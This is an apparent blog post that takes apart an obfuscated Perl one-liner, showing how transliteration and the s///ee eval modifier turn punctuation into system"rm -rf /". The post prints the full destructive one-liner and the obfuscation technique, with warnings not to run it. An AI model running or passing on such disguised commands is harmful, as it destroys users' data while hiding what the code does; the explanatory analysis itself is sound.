Analyzing a dangerous Perl snippet

I came across this Perl one-liner, that supposedly results in the system running rm -rf /, i.e., asking it to delete every file on the machine. On a modern machine this probably won't work, because an ordinary user doesn't have the right permissions to remove everything, but I'm not going to try it, and I suggest you don't try it either. Do not run this code.

perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Now, Perl is a weird language. I used to love it, but then got fed up with its idio­sync­racies, and also with how the Perldoc (docu­men­tation system and docu­men­tation site) main­tainers completely broke all hyperlinks on their website, making navigating the docu­men­tation frustrating, and didn't fix it for years, until it was replaced by another guy's implementation.

Perl has a lot of implications and shortcuts that make short programs more powerful, but they're also the reason I eventually got fed up with it; the longer a program becomes, the less useful these defaults are. And forget doing anything with Unicode and staying short and sweet; the language is from the '90s, and while it has rather good Unicode support now, you still have to explicitly ask for it with binmode(STDOUT, ':utf8') and stuff. Anyway.

Let's start the analysis, going left to right.

The first bit, perl -e is just to call the Perl interpreter; -e is for "use this next argument as the code to run".

My analysis of the structure of the program is in the following tree, with strings and regular expressions colored and underlined, and delimiters (like in s/re/repl/) colored and bolded:

$?
  ?
    s : ;s : s;;$? :
  :
    s ; ; =]=>%-{<-|}<&|`{ ;
;
y ;  -/:-@[-`{-} ; `-{/" - ; ;
s ; ; $_ ; s ee

The program consists of only three top-level statements:

  1. First is a ternary expression, "if $? is true-ish, evaluate s:::, else evaluate s;;;". Both do a string sub­sti­tution operator, s///, but with uncommon delimiters instead of the typical slash. The $? variable, also known under its long name of $CHILD_ERROR, is a built-in variable containing the exit status of the last-run child process, typically 0 if it ran successfully.
  2. Next is a trans­lite­ration operator, tr///, but with its other name of y/// and an uncommon delimiter instead of the usual slash. This works much like the tr Unix program, switching one set of characters with another set.
  3. Finally, there's an other substitution operator, written with semi­colon delimi­ters instead of slashes, but with the additional modifying options of s and ee at the end. The s modifier is defined as "treat string as single line; make . match a newline", and can appear with other regex-like operators; it's quite common, and harmless here, in fact useless, and the program works without it. The ee modifier is specific to the s/// operator, and is the most critical part of this program: it means "evaluate the right side as a string, then eval the result". This is what causes the code to execute "rm" on your system: the "right side" is evaluated to the text of a system() function call, then it's executed.

To show that the final ee is the dangerous part, just remove it and replace it with ;print. It'll print out exactly what it'll try to run, system"rm -rf /"system"rm -rf /":

A screenshot of a terminal with four lines of text, two of them almost empty.<br>
Line 1: $ <br>
Line 2: $ perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;s;print' ; echo <br>
Line 3: system"rm -rf /"system"rm -rf /" <br>
Line 4: $

The first substitution, at least on my system, produces nothing:
perl -e 's:;s:s;;$?:;print'
→ no output. Not especially surprising, as it typically isn't run at all (unless the previously-run program exits with a nonzero exit status), and even when it is, the $_ variable is empty and so the substitution has doesn't find anything to substitute.

If the dear reader is unfamiliar with Perl, the $_ or $ARG variable is sort of the "default variable", or a scratch space, or kind of like an accumulator in many computer architectures: if no other variable is specified, then input or output from functions and operators (and these substitutions like s/// and y/// are classified as operators, "quote-like operators") comes from or goes to $_, or its array counterpart @_. (In particular, the only way a function ("subroutine") can access its arguments is by looking in @_, and because Perl is weird the first element of @_ is called $_[0], because the element itself is a scalar (hence $) despite being in an array (@)... this is why I quit.) What's relevant for this analysis here is that the s/// operator performs its substitution to whatever is in $_, replacing the text in there with the result of the substitution.

The next part does produce output, as long as one doesn't copy the line from my expansion above, since whitespace breaks it. It's a substitution operator, matching an empty string, and $_ is empty, so it becomes the text on the right side. (I use -E to provide the say function, which adds a newline.)

$ perl -E 's;;=]=>%-{<-|}<&|`{;;say'
=]=>%-{<-|}<&|`{

The program has now stuffed some text into $_. The next statement is the y/// substitution statement, working very much like the Unix program tr, "trans­literating" one set of characters (the search list) into another set (the replacement list). (And yes, these are not sets in the mathematical sense, but lists; ordering is very important.)

The syntax for describing these lists can use ranges: mark the first character, add a hyphen, then the last character, and the hyphen then stands for every character in between. Implementations differ in how they deal with stuff like Unicode, whether they handle bytes or characters, but in this case the difference is moot, since we're only in the basic ASCII range. (Characters are just numbers, so "in between" is in the mathematical sense: character 36 ("$") is between characters 35 ("#") and 37 ("%"), although from a non-computer-person's perspective there's no way to order these.)

y; -/:-@[-`{-};`-{/" -;

Let's investigate these two lists of characters. I'll mark down the codes of each character as well (in decimal), since it's relevant.

The search list has x ranges: from space (character number 32) to slash (number 47), from colon (58) to at sign (64), from left square bracket (91) to backtick (96), and from left curly brace (123) to right curly brace (125). Here's a small ASCII table (with boxes in place of special characters and ␣ where space should be), with the search range highlighted:

30  □ □ ␣ ! " # $ % & '
40  ( ) * + , - . / 0 1
50  2 3 4 5 6 7 8 9 : ;
60  < = > ? @ A B C D E
70  F G H I J K L M N O
80  P Q R S T U V W X Y
90  Z [ \ ] ^ _ ` a b c
100 d e f g h i j k l m
110 n o p q r s t u v w
120 x y z { | } ~ □ □ □

Very interestingly, everything except the digits, letters and the tilde (character number 126) has been marked. The full list of characters therefore is ␣!"#$%&'()*+,-./:;<=>?@[\]^_`{|}. There are exactly 32 characters in the list.

The replacement list is one range and a bunch of extra characters: from backtick (character 90) to the left curly brace (123), and the additional characters slash (47), quotemark (34), space (32) and dash (45). The dash here does mean a literal dash: since it's at the end of the list, it doesn't mean a range. (It adds to the obfuscation, however: it looks like the range from space to semicolon.) The fully expanded replacement list is also 32 characters; they are `abcdefghijklmnopqrstuvwxyz{/" -.

When I first saw that the structure of the program was essentially just an obfuscated way of creating a string, then transliterating it, then an obfuscated way of executing it, I got a suspicion of knowing how it worked. The string in $_ is a bunch of punctuation, and the trans­literation operator turns punctuation into letters. Here's the full translation table:

␣!"#$%&'()*+,-./:;<=>?@[\]^_`{|}
`abcdefghijklmnopqrstuvwxyz{/"␣-

And here's the string, in its original form and translated:

=]=>%-{<-|}<&|`{
system"rm -rf /"

After the transliteration, there's a final substitution: s;;$_;see. The $_ variable is already filled with system"rm -rf /"; the regular expression part of the s-operator is empty, so it matches the start of the string (s//a/ adds an a to the start of a string), and replaces it with $_, which is why, if you remove the ee from the end and inspect the program state, $_ is filled with two copies of the same text.

The ee is, like mentioned before, the crux of the program: it evaluates text as a snippet of a Perl program, or, as the documentation puts it: "Evaluate the right side as a string then eval the result". The term "right side" is a bit confusing here, but I believe it refers to the replacement part of the expression itself; also confusing are the terms "evaluate as a string" and "eval", and "eval" does not mean "evaluate".

This completes the end of my analysis.


The reverse of the transliterator is y;`-{/" -; -/:-@[-`{-};, or, in a clearer form, tr(`-{/" -)( -/:-@[-`{-}), or, if you really prefer slashes, tr/`-{\/" -/ -\/:-@[-`{-}/, or, using the tr program, tr '`-{/" -' ' -\/:-@[-`{-}' .

=%#?<)>]|>(</?'(|/"=#?<)>]| /[/`


I find this very confusing:

Most of what happens in Perl's compile phase is compilation, and most of what happens in Perl's run phase is execution, but there are significant exceptions. Perl makes important use of its capability to execute Perl code during the compile phase. Perl will also delay compilation into the run phase. The terms that indicate the kind of processing that is actually occurring at any moment are compile time and run time. Perl is in compile time at most points during the compile phase, but compile time may also be entered during the run phase. The compile time for code in a string argument passed to the eval built-in occurs during the run phase. Perl is often in run time during the compile phase and spends most of the run phase in run time. Code in BEGIN blocks executes at run time but in the compile phase.

Wikipedia